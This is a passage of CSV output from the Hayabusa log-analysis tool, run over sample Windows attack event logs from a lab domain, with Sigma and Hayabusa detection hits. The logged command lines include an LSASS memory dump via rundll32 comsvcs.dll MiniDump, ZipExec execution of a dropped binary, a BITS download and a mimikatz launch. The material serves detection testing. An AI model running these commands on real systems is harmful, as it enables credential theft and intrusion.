G:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location H:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location I:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location J:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location K:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location L:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location M:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location N:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location O:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location P:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location Q:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location R:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location S:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location T:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location U:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location V:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location W:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location X:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location Y:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location Z:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location ..,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location \,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Read-Host 'Press Enter to continue...' | Out-Null,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.302 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,$this.ServiceName,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.302 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[System.Management.ManagementDateTimeConverter]::ToDateTime($args[0]),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.302 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[System.Management.ManagementDateTimeConverter]::ToDmtfDateTime($args[0]),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.349 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\vtnr8kff.dmp full;Wait-Process -Id (Get-Process rundll32).id",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.349 +00:00,FS03.offsec.lan,4104,high,CredAccess,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.349 +00:00,FS03.offsec.lan,4104,low,Disc,Suspicious Process Discovery With Get-Process,,rules/sigma/powershell/powershell_script/posh_ps_susp_get_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.349 +00:00,FS03.offsec.lan,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.396 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ GUID=""EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"" Author=""Microsoft Corporation"" CompanyName=""Microsoft Corporation"" Copyright=""© Microsoft Corporation. All rights reserved."" ModuleVersion=""3.1.0.0"" PowerShellVersion=""3.0"" CLRVersion=""4.0"" NestedModules=""Microsoft.PowerShell.Commands.Management.dll"" HelpInfoURI = 'http://go.microsoft.com/fwlink/?linkid=285756' CmdletsToExport=@(""Add-Content"", ""Clear-Content"", ""Clear-ItemProperty"", ""Join-Path"", ""Convert-Path"", ""Copy-ItemProperty"", ""Get-EventLog"", ""Clear-EventLog"", ""Write-EventLog"", ""Limit-EventLog"", ""Show-EventLog"", ""New-EventLog"", ""Remove-EventLog"", ""Get-ChildItem"", ""Get-Content"", ""Get-ItemProperty"", ""Get-WmiObject"", ""Invoke-WmiMethod"", ""Move-ItemProperty"", ""Get-Location"", ""Set-Location"", ""Push-Location"", ""Pop-Location"", ""New-PSDrive"", ""Remove-PSDrive"", ""Get-PSDrive"", ""Get-Item"", ""New-Item"", ""Set-Item"", ""Remove-Item"", ""Move-Item"", ""Rename-Item"", ""Copy-Item"", ""Clear-Item"", ""Invoke-Item"", ""Get-PSProvider"", ""New-ItemProperty"", ""Split-Path"", ""Test-Path"", ""Get-Process"", ""Stop-Process"", ""Wait-Process"", ""Debug-Process"", ""Start-Process"", ""Remove-ItemProperty"", ""Remove-WmiObject"", ""Rename-ItemProperty"", ""Register-WmiEvent"", ""Resolve-Path"", ""Get-Service"", ""Stop-Service"", ""Start-Service"", ""Suspend-Service"", ""Resume-Service"", ""Restart-Service"", ""Set-Service"", ""New-Service"", ""Set-Content"", ""Set-ItemProperty"", ""Set-WmiInstance"", ""Get-Transaction"", ""Start-Transaction"", ""Complete-Transaction"", ""Undo-Transaction"", ""Use-Transaction"", ""New-WebServiceProxy"", ""Get-HotFix"", ""Test-Connection"", ""Enable-ComputerRestore"", ""Disable-ComputerRestore"", ""Checkpoint-Computer"", ""Get-ComputerRestorePoint"", ""Restart-Computer"", ""Stop-Computer"", ""Restore-Computer"", ""Add-Computer"", ""Remove-Computer"", ""Test-ComputerSecureChannel"", ""Reset-ComputerMachinePassword"", ""Rename-Computer"", ""Get-ControlPanelItem"", ""Show-ControlPanelItem"") }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.396 +00:00,FS03.offsec.lan,4104,low,Persis,Suspicious Get-WmiObject,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_gwmi.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.396 +00:00,FS03.offsec.lan,4104,low,Disc,Suspicious Process Discovery With Get-Process,,rules/sigma/powershell/powershell_script/posh_ps_susp_get_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.396 +00:00,FS03.offsec.lan,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.427 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Process): ""Get-Process"" ParameterBinding(Get-Process): name=""Name""; value=""lsass""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.427 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Process): ""Get-Process"" ParameterBinding(Get-Process): name=""Name""; value=""rundll32""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-21 16:27:02.319 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: cscript.exe //e:jscript testme.js | Process: C:\Windows\System32\cscript.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x779c2 | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:02.319 +00:00,LAPTOP-JU4M3I0E,1,medium,Exec,WSF/JSE/JS/VBA/VBE File Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_script_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:02.999 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmdkey.exe"" /generic:Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip /pass:tWIMmIF /user:"""" | Process: C:\Windows\System32\cmdkey.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 15156 | PGUID: 00247C92-94D6-6171-0000-00103F5A967B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:02.999 +00:00,LAPTOP-JU4M3I0E,1,medium,Exec | Evas,Suspicious ZipExec Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:02.999 +00:00,LAPTOP-JU4M3I0E,1,medium,LatMov,Remote Desktop Protocol Use Mstsc,,rules/sigma/process_creation_sysmon/proc_creation_win_mstsc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:03.398 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\lync.zip | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:12.523 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:12.549 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:12.549 +00:00,LAPTOP-JU4M3I0E,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:12.858 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe"" | Process: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 17264 | PGUID: 00247C92-94E0-6171-0000-00107424987B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:12.858 +00:00,LAPTOP-JU4M3I0E,1,high,Exec,Script Interpreter Execution From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_script_exec_from_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:12.858 +00:00,LAPTOP-JU4M3I0E,1,medium,Evas,Renamed Binary,,rules/sigma/process_creation_sysmon/proc_creation_win_renamed_binary.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:12.858 +00:00,LAPTOP-JU4M3I0E,1,medium,Impact,Run from a Zip File,,rules/sigma/process_creation_sysmon/proc_creation_win_run_from_zip.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:12.858 +00:00,LAPTOP-JU4M3I0E,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:12.946 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmdkey.exe"" /delete Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip | Process: C:\Windows\System32\cmdkey.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 19000 | PGUID: 00247C92-94E0-6171-0000-0010B84D987B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:12.946 +00:00,LAPTOP-JU4M3I0E,1,medium,Exec | Evas,Suspicious ZipExec Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 16:27:14.015 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" popup ""Malicious Behavior Detection Alert"" ""Elastic Security detected Execution via Renamed Signed Binary Proxy"" ""C:\Program Files\Elastic\Endpoint\cache\resources\elastic-endpoint-security.png"" | Process: C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" run | LID: 0x779c2 | PID: 26868 | PGUID: 00247C92-94E0-6171-0000-00104337987B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-21 17:38:36.711 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md -Destination C:\Users\bits.ps1,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-21 17:38:36.711 +00:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-21 17:38:36.742 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Join-Path): ""Join-Path"" ParameterBinding(Join-Path): name=""Path""; value=""C:\windows\system32\windowspowershell\v1.0\Modules\BitsTransfer"" ParameterBinding(Join-Path): name=""ChildPath""; value=""Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-21 17:38:36.742 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ GUID=""{8FA5064B-8479-4c5c-86EA-0D311FE48875}"" Author=""Microsoft Corporation"" CompanyName=""Microsoft Corporation"" Copyright=""© Microsoft Corporation. All rights reserved."" ModuleVersion=""1.0.0.0"" PowerShellVersion=""2.0"" CLRVersion=""2.0"" NestedModules=""Microsoft.BackgroundIntelligentTransfer.Management"" FormatsToProcess=""BitsTransfer.Format.ps1xml"" RequiredAssemblies=Join-Path $psScriptRoot ""Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll"" CmdletsToExport=""Add-BitsFile"",""Complete-BitsTransfer"",""Get-BitsTransfer"",""Remove-BitsTransfer"",""Resume-BitsTransfer"",""Set-BitsTransfer"",""Start-BitsTransfer"",""Suspend-BitsTransfer"" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-21 17:38:36.742 +00:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-21 17:38:37.084 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Start-BitsTransfer): ""Start-BitsTransfer"" ParameterBinding(Start-BitsTransfer): name=""Priority""; value=""foreground"" ParameterBinding(Start-BitsTransfer): name=""Source""; value=""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md"" ParameterBinding(Start-BitsTransfer): name=""Destination""; value=""C:\Users\bits.ps1""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-21 17:38:37.084 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-21 17:38:37.084 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Diagnostics.DebuggerHidden()] param() $foundSuggestion = $false if($lastError -and ($lastError.Exception -is ""System.Management.Automation.CommandNotFoundException"")) { $escapedCommand = [System.Management.Automation.WildcardPattern]::Escape($lastError.TargetObject) $foundSuggestion = @(Get-Command ($ExecutionContext.SessionState.Path.Combine(""."", $escapedCommand)) -ErrorAction Ignore).Count -gt 0 } $foundSuggestion",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-21 17:38:37.084 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""The command $($lastError.TargetObject) was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default. If you trust this command, instead type `"".\$($lastError.TargetObject)`"". See `""get-help about_Command_Precedence`"" for more details.""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-21 17:38:37.100 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-21 17:53:42.530 +00:00,FS03.offsec.lan,59,info,Evas | Persis,Bits Job Created,Job Title: BITS Transfer | URL: https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-desktop-amd64.iso,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID60-High volume file downloaded with BITS.evtx +2021-10-21 20:40:12.867 +00:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: mimikatz.exe | Process: C:\TOOLS\Mimikatzx64\mimikatz.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1f4c65f | PID: 2032 | PGUID: 7CF65FC7-D02C-6171-1203-000000001200 | Hash: 